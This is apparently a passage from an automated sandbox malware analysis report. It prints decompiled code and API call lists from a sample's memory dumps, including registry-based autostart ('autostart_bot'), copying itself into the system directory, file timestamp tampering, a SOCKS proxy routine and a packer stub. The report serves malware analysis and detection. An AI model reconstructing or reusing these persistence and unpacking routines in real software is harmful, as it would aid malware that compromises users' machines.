				void* _t46;

				if(_a8 == 1) {
					 *0x10006094 = _a4;
					_v24 =  &_v8;
					CreateThread(0, 0, E10002EA8, 0, 0); // executed
					_v28 =  &_v8;
					CreateThread(0, 0, E10002020, 0, 0); // executed
					_v32 =  &_v8;
					CreateThread(0, 0, E100029B8, 0, 0); // executed
					_v36 =  &_v8;
					CreateThread(0, 0, E10002A60, 0, 0); // executed
					_v40 =  &_v8;
					_v44 = 0;
					_v48 = 0;
					_v52 = E10002CEF;
					_v56 = 0;
					 *(_t46 - 0xffffffffffffffd0) = 0; // executed
					CreateThread(??, ??, ??, ??, ??, ??); // executed
					return 1;
				}
				return 1;
			}

0x10002ed5
0x10002ede
0x10002ee6
0x10002f11
0x10002f1c
0x10002f47
0x10002f52
0x10002f7d
0x10002f88
0x10002fb3
0x10002fbe
0x10002fc2
0x10002fca
0x10002fd2
0x10002fda
0x10002fe2
0x10002fe9
0x00000000
0x10002ff1
0x10002ff7

APIs

CreateThread.KERNEL32 ref: 10002F11
CreateThread.KERNEL32 ref: 10002F47
CreateThread.KERNEL32 ref: 10002F7D
CreateThread.KERNEL32 ref: 10002FB3
CreateThread.KERNEL32 ref: 10002FE9

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: db1163f0d3c2b5508896f4cc3b28de1abc3cefb256ba2f04d419c1cc24af5f4c
Instruction ID: 15f36a74acdf4c5ebf03c8018694f62f40f6a90330da7fbec1f69af9675bd8bc
Opcode Fuzzy Hash: db1163f0d3c2b5508896f4cc3b28de1abc3cefb256ba2f04d419c1cc24af5f4c
Instruction Fuzzy Hash: 68217EB4409345AFE300EF24C65934FBFF4EB84785F40891DE4985B285E3BA9A489F93

Uniqueness

Uniqueness Score: -1.00%

Function 1000274E Relevance: 7.6, APIs: 5, Instructions: 50
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E1000274E(char* _a4, intOrPtr _a8, char _a12) {
				void* _v12;
				void* _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				int _v40;
				char _v44;
				long _t23;
				long _t29;
				char* _t31;
				char _t32;
				void* _t33;
				void* _t35;
				intOrPtr* _t36;

				_t31 = _a4;
				_t32 = _a12;
				_t23 = RegOpenKeyExA(0x80000002, _t31, 0, 0x20006,  &_v16);
				_t35 = _t33 - 0xc;
				if(_t23 == 0) {
					L2:
					_v44 = _t32;
					L10003570();
					_t36 = _t35 - 4;
					_v28 = _t23 + 1;
					_v32 = _t32;
					_v36 = 1;
					_v40 = 0;
					_v44 = _a8;
					 *_t36 = _v16; // executed
					RegSetValueExA(??, ??, ??, ??, ??, ??); // executed
					 *((intOrPtr*)(_t36 - 0x18)) = _v16;
					_t29 = RegCloseKey(??);
				} else {
					_t29 = RegOpenKeyExA(0x80000001, _t31, 0, 0x20006,  &_v16);
					_t35 = _t35 - 0x14;
					if(_t29 == 0) {
						goto L2;
					}
				}
				return _t29;
			}

0x10002756
0x10002759
0x1000277e
0x10002783
0x10002788
0x100027b8
0x100027b8
0x100027bb
0x100027c0
0x100027c4
0x100027c8
0x100027cc
0x100027d4
0x100027df
0x100027e6
0x100027e9
0x100027f4
0x100027f7
0x1000278a
0x100027ac
0x100027b1
0x100027b6
0x00000000
0x00000000
0x100027b6
0x10002805

APIs

RegOpenKeyExA.ADVAPI32 ref: 1000277E
RegOpenKeyExA.ADVAPI32 ref: 100027AC
lstrlen.KERNEL32 ref: 100027BB
RegSetValueExA.ADVAPI32 ref: 100027E9
RegCloseKey.ADVAPI32 ref: 100027F7

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: Open$CloseValuelstrlen
String ID:
API String ID: 1812710942-0
Opcode ID: 8076f9db43a5ac6dba544c66358812596f95421586db3cef0b3e8a3b3525caf9
Instruction ID: a357a9c538cd1e9a3b197412e68688e2a35a0a2f8c1334e24df635a0a12a9609
Opcode Fuzzy Hash: 8076f9db43a5ac6dba544c66358812596f95421586db3cef0b3e8a3b3525caf9
Instruction Fuzzy Hash: 5D11D4B4808305AFE700EF69D58535FBBF8EF44394F00882EEC9887245E375E6488B82

Uniqueness

Uniqueness Score: -1.00%

Function 00404690 Relevance: 7.6, APIs: 5, Instructions: 50
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00404690(char* _a4, intOrPtr _a8, char _a12) {
				void* _v12;
				void* _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				int _v40;
				char _v44;
				long _t23;
				long _t29;
				char* _t31;
				char _t32;
				void* _t33;
				void* _t35;
				intOrPtr* _t36;

				_t31 = _a4;
				_t32 = _a12;
				_t23 = RegOpenKeyExA(0x80000002, _t31, 0, 0x20006,  &_v16); // executed
				_t35 = _t33 - 0xc;
				if(_t23 == 0) {
					L2:
					_v44 = _t32;
					L0040C310();
					_t36 = _t35 - 4;
					_v28 = _t23 + 1;
					_v32 = _t32;
					_v36 = 1;
					_v40 = 0;
					_v44 = _a8;
					 *_t36 = _v16; // executed
					RegSetValueExA(??, ??, ??, ??, ??, ??); // executed
					 *((intOrPtr*)(_t36 - 0x18)) = _v16;
					_t29 = RegCloseKey(??);
				} else {
					_t29 = RegOpenKeyExA(0x80000001, _t31, 0, 0x20006,  &_v16);
					_t35 = _t35 - 0x14;
					if(_t29 == 0) {
						goto L2;
					}
				}
				return _t29;
			}

0x00404698
0x0040469b
0x004046c0
0x004046c5
0x004046ca
0x004046fa
0x004046fa
0x004046fd
0x00404702
0x00404706
0x0040470a
0x0040470e
0x00404716
0x00404721
0x00404728
0x0040472b
0x00404736
0x00404739
0x004046cc
0x004046ee
0x004046f3
0x004046f8
0x00000000
0x00000000
0x004046f8
0x00404747

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,00403CA0), ref: 004046C0
RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403CA0), ref: 004046EE
lstrlen.KERNEL32 ref: 004046FD
RegSetValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403CA0), ref: 0040472B
RegCloseKey.ADVAPI32 ref: 00404739

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Open$CloseValuelstrlen
String ID:
API String ID: 1812710942-0
Opcode ID: f1a880515f559899bd4e2589cbcf0413c90a96f87d2e0a2aac5912ecd81a10fa
Instruction ID: 9df0ca142f19effaadb1cf883799336216af180bd5b83d8b0879c3bebcc9d83d
Opcode Fuzzy Hash: f1a880515f559899bd4e2589cbcf0413c90a96f87d2e0a2aac5912ecd81a10fa
Instruction Fuzzy Hash: A711D4B0808315AFD700EF69C58535EBBF4FB84358F40892EEC9897241E37996488B92

Uniqueness

Uniqueness Score: -1.00%

Function 100029B8 Relevance: 7.5, APIs: 5, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

rot13.SHERVANS ref: 100029D3

Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40

add_system_direcroty.SHERVANS ref: 100029ED

Part of subcall function 10002209: memset.MSVCRT ref: 10002226
Part of subcall function 10002209: GetSystemDirectoryA.KERNEL32 ref: 10002232
Part of subcall function 10002209: lstrlen.KERNEL32 ref: 1000223D
Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002257
Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002269

autostart_bot.SHERVANS ref: 100029F2

Part of subcall function 1000237F: rot13.SHERVANS ref: 1000239A
Part of subcall function 1000237F: add_system_direcroty.SHERVANS ref: 100023B4
Part of subcall function 1000237F: rot13.SHERVANS ref: 100023CA
Part of subcall function 1000237F: rot13.SHERVANS ref: 100023E0
Part of subcall function 1000237F: RegOpenKeyExA.ADVAPI32 ref: 1000240A
Part of subcall function 1000237F: RegOpenKeyExA.ADVAPI32 ref: 1000243B
Part of subcall function 1000237F: lstrlen.KERNEL32 ref: 10002450
Part of subcall function 1000237F: RegSetValueExA.ADVAPI32 ref: 10002484
Part of subcall function 1000237F: RegCloseKey.ADVAPI32 ref: 10002495

Sleep.KERNEL32 ref: 10002A04
xsocks5.SHERVANS ref: 10002A0F

Part of subcall function 10002278: rot13.SHERVANS ref: 10002297
Part of subcall function 10002278: RegOpenKeyExA.ADVAPI32 ref: 100022C1
Part of subcall function 10002278: RegCreateKeyExA.ADVAPI32 ref: 10002312
Part of subcall function 10002278: lstrlen.KERNEL32 ref: 10002326
Part of subcall function 10002278: RegSetValueExA.ADVAPI32 ref: 10002358
Part of subcall function 10002278: RegCloseKey.ADVAPI32 ref: 10002369

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: rot13$Openlstrlen$CloseValueadd_system_direcrotylstrcat$CreateDirectorySleepSystemautostart_botmemsetrot13cxsocks5
String ID:
API String ID: 1953300677-0
Opcode ID: 2f4a38cdcf28ce0af05b94f57a53248966ada0ad6c96a035229aa7fbd1f2329a
Instruction ID: e766e933713ebb2fd00dc86ca103d495f6d4a30245a9b19533916551fb43bf76
Opcode Fuzzy Hash: 2f4a38cdcf28ce0af05b94f57a53248966ada0ad6c96a035229aa7fbd1f2329a
Instruction Fuzzy Hash: 9FF0C0B4408708ABE750EF60C58565EBBB4EF00390F41896CE8C94324AE73565C89F53

Uniqueness

Uniqueness Score: -1.00%

Function 004056D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 004056F4

Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680

CopyFileA.KERNEL32 ref: 0040573B

Part of subcall function 004054F2: CreateFileA.KERNEL32 ref: 00405531
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405574
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040559A
Part of subcall function 004054F2: Sleep.KERNEL32 ref: 004055A9
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 004055D4
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004055FA
Part of subcall function 004054F2: Sleep.KERNEL32 ref: 00405609
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405634
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040565A
Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 0040567D
Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004056AF
Part of subcall function 004054F2: CloseHandle.KERNEL32 ref: 004056C0

Part of subcall function 0040435C: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404399
Part of subcall function 0040435C: GetFileTime.KERNEL32 ref: 004043CD
Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 004043E5
Part of subcall function 0040435C: CreateFileA.KERNEL32 ref: 00404423
Part of subcall function 0040435C: SetFileTime.KERNEL32 ref: 00404453
Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 00404467

Strings

user32.dll, xrefs: 0040574B
tepbcl.qyy, xrefs: 004056FC

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: File$PointerWrite$CloseCreateHandle$SleepTimelstrcat$CopyDirectoryModuleNameSystemlstrlenmemset
String ID: tepbcl.qyy$user32.dll
API String ID: 3363447152-446725262
Opcode ID: de95d79bbbfaf08a5f65ed3c41234fbb1e38ded78e62ee2fe25aec3cbfbd0c72
Instruction ID: 761182c28210547fcfec4951540a2b2b9fde320736257bd646c4dd079449f565
Opcode Fuzzy Hash: de95d79bbbfaf08a5f65ed3c41234fbb1e38ded78e62ee2fe25aec3cbfbd0c72
Instruction Fuzzy Hash: D401EDF08097149AC710BF65D58529EBFF4EF84758F01886EF5C827281C7B95588CB97

Uniqueness

Uniqueness Score: -1.00%

Function 10002B9C Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 10002BD6
RegOpenKeyExA.ADVAPI32 ref: 10002C04
RegQueryValueExA.ADVAPI32 ref: 10002C3F
RegCloseKey.ADVAPI32 ref: 10002C4F

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID:
API String ID: 3546245721-0
Opcode ID: ad9b9523f42a2e9449b14fb8281407f1dc35ffddc838d3f016af78ec4bc48b7f
Instruction ID: b21aa83fbe8ad37c53a20fbf8e9d077e9d87781769b07b01f65202f866b88801
Opcode Fuzzy Hash: ad9b9523f42a2e9449b14fb8281407f1dc35ffddc838d3f016af78ec4bc48b7f
Instruction Fuzzy Hash: 3621C8B49043099FE700EF69C58575EBBF4EF48384F40886DE89897345E374DA488B52

Uniqueness

Uniqueness Score: -1.00%

Function 10001F57 Relevance: 6.1, APIs: 4, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 10001F90
RegOpenKeyExA.ADVAPI32 ref: 10001FBE
RegQueryValueExA.ADVAPI32 ref: 10001FF9
RegCloseKey.ADVAPI32 ref: 10002009

Memory Dump Source

Source File: 00000000.00000002.272186570.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.272180761.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272191811.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272194370.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272197653.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272231192.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.272234892.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_EAfIchN1gN.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID:
API String ID: 3546245721-0
Opcode ID: 27a766e30244a2e05984018c0b4b905970e7196a3b8cd9ad0044181cec5309ac
Instruction ID: 85737ef945bcec28308b1c993999e411a83c54719117432306d8d37fab97eb4a
Opcode Fuzzy Hash: 27a766e30244a2e05984018c0b4b905970e7196a3b8cd9ad0044181cec5309ac
Instruction Fuzzy Hash: 082193B4904309AFDB00EF69C58579EBBF4EF48394F40886DE89893345E374D6488B92

Uniqueness

Uniqueness Score: -1.00%

Function 00404748 Relevance: 6.1, APIs: 4, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,00404A84), ref: 00404781
RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047AF
RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047EA
RegCloseKey.ADVAPI32 ref: 004047FA

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID:
API String ID: 3546245721-0
Opcode ID: 788364dfb925f572286ead044381b62b9ce985eb10bd0cffd60a9e6ef2279f1d
Instruction ID: 6ed68635854e72cbad61cdb7226dc2d583aa3803ebbc72776a4c5814d6946410
Opcode Fuzzy Hash: 788364dfb925f572286ead044381b62b9ce985eb10bd0cffd60a9e6ef2279f1d
Instruction Fuzzy Hash: 962179B49043099FD700EF69D58579EBBF4BB48354F40896EE89897341E378D648CB52

Uniqueness

Uniqueness Score: -1.00%

Function 004048E2 Relevance: 6.0, APIs: 4, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00403CC4), ref: 0040490E
RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403CC4), ref: 0040493C
RegSetValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404974
RegCloseKey.ADVAPI32 ref: 00404982

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: Open$CloseValue
String ID:
API String ID: 503941690-0
Opcode ID: 8273f13c3081dc19d4445e322601c3b2f268dd5fec60ff3e337f340c7e888451
Instruction ID: d52cf87232b6bef55ae32812e2a2d770b7a0cdaf13e0b01d7b079ce95a9ef0d7
Opcode Fuzzy Hash: 8273f13c3081dc19d4445e322601c3b2f268dd5fec60ff3e337f340c7e888451
Instruction Fuzzy Hash: 8711C2F0808305AFDB00EF69C18575EBBF4BB84358F40892EE88897241E378D6488F92

Uniqueness

Uniqueness Score: -1.00%

Function 1000B670 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 53%

			_entry_(intOrPtr _a4, char _a8, intOrPtr _a12) {
				void* _v12;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v128;
				long _t34;
				long _t35;
				long _t40;
				long _t47;
				signed int _t49;
				intOrPtr _t52;
				void* _t57;
				intOrPtr* _t58;

				if(_a8 != 1) {
					L62:
					_t58 = _t57 - 0x10;
					_t52 = _a8;
					if(_t52 == 1) {
						 *_t58 = 0x80;
						_t34 = malloc(??);
						 *0x10006000 = _t34;
						__eflags = _t34;
						if(_t34 == 0) {
							L100034A0();
							 *_t34 = 0xc;
							_t35 = 0;
						} else {
							 *_t34 = 0;
							 *0x10006010 = _t34;
							E10003110(_t34);
							E100030F0();
							goto L2;
						}
					} else {
						L2:
						_v24 = _t52;
						_v20 = _a12;
						 *_t58 = _a4; // executed
						_t40 = E10002EC6(); // executed
						_t47 = _t40;
						if(((0 | _t47 == 0x00000000) & (_t49 & 0xffffff00 | _t52 == 0x00000001)) != 0) {
							E10001000();
						}
						if(_t52 == 0) {
							if( *0x10006000 != 0) {
								E10001000();
							} else {
								_t47 = 0;
							}
						}
						_t35 = _t47;
					}
					return _t35;
				} else {
					asm("pushad");
					__esi = "oseHandle";
					__edi = __esi - 0x9015;
					_push(__edi);
					while(1) {
						__ebx =  *__esi;
						__esi = __esi - 0xfffffffc;
						asm("adc ebx, ebx");
						do {
							if(__eflags < 0) {
								__al =  *__esi;
								__esi = __esi + 1;
								 *__edi = __al;
								__edi = __edi + 1;
								__eflags = __edi;
								goto L15;
							}
							__eax = 1;
							goto L19;
							do {
								do {
									L19:
									__ebx = __ebx + __ebx;
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebx =  *__esi;
										__esi = __esi - 0xfffffffc;
										asm("adc ebx, ebx");
									}
									asm("adc eax, eax");
									__ebx = __ebx + __ebx;
									__eflags = __ebx;
								} while (__eflags >= 0);
								if(__eflags == 0) {
									goto L23;
								}
								break;
								L23:
								__ebx =  *__esi;
								__esi = __esi - 0xfffffffc;
								__eflags = __esi;
								asm("adc ebx, ebx");
							} while (__esi >= 0);
							__ecx = 0;
							__eax = __eax - 3;
							__eflags = __eax;
							if(__eax < 0) {
								L27:
								__ebx = __ebx + __ebx;
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebx =  *__esi;
									__esi = __esi - 0xfffffffc;
									asm("adc ebx, ebx");
								}
								asm("adc ecx, ecx");
								__ebx = __ebx + __ebx;
								__eflags = __ebx;
								if(__eflags == 0) {
									__ebx =  *__esi;
									__esi = __esi - 0xfffffffc;
									asm("adc ebx, ebx");
								}
								asm("adc ecx, ecx");
								if(__eflags == 0) {
									__ecx = __ecx + 1;
									__eflags = __ecx;
									goto L33;
									do {
										do {
											L33:
											__ebx = __ebx + __ebx;
											__eflags = __ebx;
											if(__ebx == 0) {
												__ebx =  *__esi;
												__esi = __esi - 0xfffffffc;
												asm("adc ebx, ebx");
											}
											asm("adc ecx, ecx");
											__ebx = __ebx + __ebx;
											__eflags = __ebx;
										} while (__eflags >= 0);
										if(__eflags == 0) {
											goto L37;
										}
										break;
										L37:
										__ebx =  *__esi;
										__esi = __esi - 0xfffffffc;
										__eflags = __esi;
										asm("adc ebx, ebx");
									} while (__esi >= 0);
									__ecx = __ecx + 2;
									__eflags = __ecx;
								}
								__eflags = __ebp - 0xfffff300;
								asm("adc ecx, 0x1");
								__edx = __edi + __ebp;
								__eflags = __ebp - 0xfffffffc;
								if(__ebp <= 0xfffffffc) {
									do {
										__eax =  *__edx;
										__edx =  &(__edx[1]);
										 *__edi = __eax;
										__edi = __edi + 4;
										__ecx = __ecx - 4;
										__eflags = __ecx;
									} while (__ecx > 0);
									__edi = __edi + __ecx;
								} else {
									do {
										__al =  *__edx;
										__edx =  &(__edx[0]);
										 *__edi = __al;
										__edi = __edi + 1;
										__ecx = __ecx - 1;
										__eflags = __ecx;
									} while (__ecx != 0);
								}
								goto L15;
								do {
									do {
										L45:
										__al =  *__edi;
										__edi = __edi + 1;
										__al = __al - 0xe8;
										__eflags = __al - 1;
									} while (__al > 1);
									__eflags =  *__edi;
								} while ( *__edi != 0);
								__eax =  *__edi;
								__bl =  *(__edi + 4);
								__ax = __ax >> 8;
								asm("rol eax, 0x10");
								_t17 = __al;
								__al = __ah;
								__ah = _t17;
								__eax =  *__edi - __edi;
								__bl =  *(__edi + 4) - 0xe8;
								__eax = __esi +  *__edi - __edi;
								 *__edi = __esi +  *__edi - __edi;
								__eflags = __edi;
								__al = __bl;
								asm("loop 0xffffffdb");
								__edi = __esi + 0x9000;
								while(1) {
									L48:
									__eax =  *__edi;
									__eax =  *__edi;
									__eflags = __eax;
									if(__eax == 0) {
										break;
									}
									__ebx =  *(__edi + 4);
									__eax = __eax + __esi + 0xb000;
									__ebx = __esi +  *(__edi + 4);
									__edi = __edi + 8;
									__eflags = __edi;
									_t23 =  *((intOrPtr*)(__esi + 0xb078))(__eax);
									__eax = __ebp;
									__ebp = _t23;
									while(1) {
										__al =  *__edi;
										__edi = __edi + 1;
										__al = __al;
										__eflags = __al;
										if(__al == 0) {
											goto L48;
										}
										__ecx = __edi;
										__eax = __eax - 1;
										asm("repne scasb");
										__eax =  *((intOrPtr*)(__esi + 0xb07c))(__ebp, __edi);
										__eax = __eax;
										__eflags = __eax;
										if(__eax == 0) {
											asm("popad");
											__eax = 0;
											__eflags = 0;
											return 0;
										} else {
											 *__ebx = __eax;
											__ebx = __ebx + 4;
											continue;
										}
										goto L63;
									}
								}
								__edi = __edi + 4;
								__eflags = __edi;
								__ebx = __esi - 4;
								while(1) {
									__eax = 0;
									__al =  *__edi;
									__edi = __edi + 1;
									__eax = 0;
									__eflags = 0;
									if(0 == 0) {
										break;
									}
									__eflags = __al - 0xef;
									if(__al > 0xef) {
										__al = __al & 0x0000000f;
										__eax = 0 << 0x10;
										__ax =  *__edi;
										__edi = __edi + 2;
									}
									__ebx = __ebx + __eax;
									__eax =  *__ebx;
									_t26 = __al;
									__al = __ah;
									__ah = _t26;
									asm("rol eax, 0x10");
									_t27 = __al;
									__al = _t26;
									__ah = _t27;
									__eax = __esi +  *__ebx;
									 *__ebx = __esi +  *__ebx;
								}
								__ebp =  *(__esi + 0xb080);
								__edi = __esi - 0x1000;
								__ebx = 0x1000;
								_push(0);
								__eax = VirtualProtect(__edi, 0x1000, 4, __esp); // executed
								__eax = __edi + 0x19f;
								 *__eax =  *__eax & 0x0000007f;
								_t31 = __eax + 0x28;
								 *_t31 =  *(__eax + 0x28) & 0x0000007f;
								__eflags =  *_t31;
								_pop(__eax);
								__eax = VirtualProtect(__edi, 0x1000, __eax, __esp); // executed
								__eax = __eax;
								asm("popad");
								__eax =  &_v128;
								do {
									_push(0);
									__eflags = __esp - __eax;
								} while (__esp != __eax);
								__esp = __esp - 0xffffff80;
								goto L62;
							}
							__eax = __eax << 8;
							__al =  *__esi;
							__esi = __esi + 1;
							__eax = __eax ^ 0xffffffff;
							__eflags = __eax;
							if(__eax != 0) {
								__ebp = __eax;
								goto L27;
							}
